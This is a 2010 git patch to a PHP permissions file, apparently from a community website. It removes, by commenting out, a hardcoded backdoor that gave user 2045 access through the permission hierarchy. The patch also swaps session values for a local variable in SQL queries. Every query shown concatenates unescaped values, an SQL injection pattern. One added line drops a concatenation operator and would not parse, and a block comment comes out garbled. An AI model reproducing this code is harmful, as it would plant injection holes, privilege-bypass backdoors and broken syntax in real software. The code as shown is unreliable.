From 8dabb29b22afd3659e4df7cedacb8df593fc8ba4 Mon Sep 17 00:00:00 2001
From: niekt0 <niekt0@kyberia.cz>
Date: Fri, 12 Nov 2010 01:22:03 +0100
Subject: [PATCH] small warning fix & removed is 2045 backdoor

---
 wwwroot/inc/permissions.inc | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/wwwroot/inc/permissions.inc b/wwwroot/inc/permissions.inc
index 942a3f4..ed92170 100644
--- a/wwwroot/inc/permissions.inc
+++ b/wwwroot/inc/permissions.inc
@@ -11,7 +11,7 @@ function isHierarch($node) {
 	$hierarchy=explode(';',$node_vector);
 	foreach ($hierarchy as $hierarch) {
 		$hierarch=ltrim($hierarch,0);
-		$q="select nodes.node_creator,node_access.node_permission from nodes left join node_access on nodes.node_id=node_access.node_id and node_access.user_id='".$_SESSION['user_id']."' where nodes.node_id='$hierarch'";
+		$q="select nodes.node_creator,node_access.node_permission from nodes left join node_access on nodes.node_id=node_access.node_id and node_access.user_id='".$user_id."' where nodes.node_id='$hierarch'";
 		$result=$db->query($q);
 		$result->next();
 		if ($result->getString('node_creator')==$user_id)
@@ -20,8 +20,8 @@ function isHierarch($node) {
 			return true;
 		if ($result->getString('node_creator')=='operator')
 			return true;
-		if ($user_id == 2045)
-			return true;
+//		if ($user_id == 2045)  // OMG
+//			return true;
 	}
 	return false;
 
@@ -32,7 +32,7 @@ global $db;
 $user_id=$_SESSION['user_id'];
 
 /*
-thousand lights to Hierarchy!
+thousand lights   // OMGto Hierarchy!
 (check&set procedure for giving permissions for non-public subnodes according
 to bottom-top Hierarchy
 */
@@ -41,7 +41,7 @@ if (($node['node_system_access']!='public' and $node['node_system_access']!='cry
 	$hierarchy=array_reverse(explode(';',$node_vector));
 	foreach ($hierarchy as $hierarch) {
 		$hierarch=ltrim($hierarch,0);
-		$q="select nodes.node_creator,nodes.node_system_access,node_access.node_permission from nodes left join node_access on nodes.node_id=node_access.node_id and node_access.user_id='".$_SESSION['user_id']."' where nodes.node_id='$hierarch'";
+		$q="select nodes.node_creator,nodes.node_system_access,node_access.node_permission from nodes left join node_access on nodes.node_id=node_access.node_id and node_access.user_id='".$user_id."' where nodes.node_id='$hierarch'";
 		$result=$db->query($q);
 		$result->next();
 		$hierarchy_bounce[]=$hierarch;
@@ -55,7 +55,7 @@ if (($node['node_system_access']!='public' and $node['node_system_access']!='cry
 		elseif ($result->getString('node_permission')!='') {
 			array_pop($hierarchy_bounce);
 			$node['node_permission']=$result->getString('node_permission');
-				$q="update node_access set node_permission='".$result->getString('node_permission')."' where node_id='".$node['node_id']."' and user_id='".$_SESSION['user_id']."'";
+				$q="update node_access set node_permission='".$result->getString('node_permission')."' where node_id='".$node['node_id']."' and user_id='".$user_id"'";
 				$updated=$db->update($q);
 				if (!$updated && IsSet($_SESSION['user_id'])) {
 					$q="insert into node_access set node_permission='".$result->getString('node_permission')."', node_id='".$node['node_id']."',user_id='".$_SESSION['user_id']."'";
-- 
2.30.2